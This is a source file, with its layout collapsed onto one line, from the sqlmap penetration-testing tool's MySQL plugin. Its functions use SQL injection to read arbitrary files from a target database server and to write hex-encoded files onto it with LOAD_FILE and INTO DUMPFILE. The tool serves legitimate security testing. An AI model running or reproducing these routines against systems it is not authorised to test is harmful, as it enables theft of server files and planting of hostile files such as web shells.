#!/usr/bin/env python """ $Id$ This file is part of the sqlmap project, http://sqlmap.sourceforge.net. Copyright (c) 2007-2010 Bernardo Damele A. G. Copyright (c) 2006 Daniele Bellucci sqlmap is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License. sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with sqlmap; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA """ from lib.core.common import randomStr from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.exception import sqlmapNoneDataException from lib.request import inject from lib.techniques.inband.union.test import unionTest from lib.techniques.inband.union.use import unionUse from plugins.generic.filesystem import Filesystem as GenericFilesystem class Filesystem(GenericFilesystem): def __init__(self): GenericFilesystem.__init__(self) def unionReadFile(self, rFile): infoMsg = "fetching file: '%s'" % rFile logger.info(infoMsg) result = inject.getValue("SELECT HEX(LOAD_FILE('%s'))" % rFile) return result def stackedReadFile(self, rFile): infoMsg = "fetching file: '%s'" % rFile logger.info(infoMsg) self.createSupportTbl(self.fileTblName, self.tblField, "longtext") self.getRemoteTempPath() tmpFile = "%s/tmpf%s" % (conf.tmpPath, randomStr(lowercase=True)) debugMsg = "saving hexadecimal encoded content of file '%s' " % rFile debugMsg += "into temporary file '%s'" % tmpFile logger.debug(debugMsg) inject.goStacked("SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'" % (rFile, tmpFile)) debugMsg = "loading the content of hexadecimal encoded file " debugMsg += "'%s' into support table" % rFile logger.debug(debugMsg) inject.goStacked("LOAD DATA INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY '%s' (%s)" % (tmpFile, self.fileTblName, randomStr(10), self.tblField)) length = inject.getValue("SELECT LENGTH(%s) FROM %s" % (self.tblField, self.fileTblName), sort=False, resumeValue=False, charsetType=2) if length is None or not length.isdigit() or not len(length) or length in ( "0", "1" ): errMsg = "unable to retrieve the content of the " errMsg += "file '%s'" % rFile raise sqlmapNoneDataException, errMsg length = int(length) sustrLen = 1024 if length > sustrLen: result = [] for i in range(1, length, sustrLen): chunk = inject.getValue("SELECT MID(%s, %d, %d) FROM %s" % (self.tblField, i, sustrLen, self.fileTblName), unpack=False, sort=False, resumeValue=False, charsetType=3) result.append(chunk) else: result = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.fileTblName), sort=False, resumeValue=False, charsetType=3) return result def unionWriteFile(self, wFile, dFile, fileType, confirm=True): logger.debug("encoding file to its hexadecimal string value") fcEncodedList = self.fileEncode(wFile, "hex", True) fcEncodedStr = fcEncodedList[0] fcEncodedStrLen = len(fcEncodedStr) if kb.injPlace == "GET" and fcEncodedStrLen > 8000: warnMsg = "the injection is on a GET parameter and the file " warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen warnMsg += "bytes, this might cause errors in the file " warnMsg += "writing process" logger.warn(warnMsg) unionTest() oldParamFalseCond = kb.unionFalseCond kb.unionFalseCond = True debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile) logger.debug(debugMsg) sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, dFile) unionUse(sqlQuery, direct=True, unescape=False, nullChar="''") kb.unionFalseCond = oldParamFalseCond if confirm: self.askCheckWrittenFile(wFile, dFile, fileType) def stackedWriteFile(self, wFile, dFile, fileType, confirm=True): debugMsg = "creating a support table to write the hexadecimal " debugMsg += "encoded file to" logger.debug(debugMsg) self.createSupportTbl(self.fileTblName, self.tblField, "longblob") logger.debug("encoding file to its hexadecimal string value") fcEncodedList = self.fileEncode(wFile, "hex", False) debugMsg = "forging SQL statements to write the hexadecimal " debugMsg += "encoded file to the support table" logger.debug(debugMsg) sqlQueries = self.fileToSqlQueries(fcEncodedList) logger.debug("inserting the hexadecimal encoded file to the support table") for sqlQuery in sqlQueries: inject.goStacked(sqlQuery) debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile) logger.debug(debugMsg) # Reference: http://dev.mysql.com/doc/refman/5.1/en/select.html inject.goStacked("SELECT %s FROM %s INTO DUMPFILE '%s'" % (self.tblField, self.fileTblName, dFile), silent=True) if confirm: self.askCheckWrittenFile(wFile, dFile, fileType)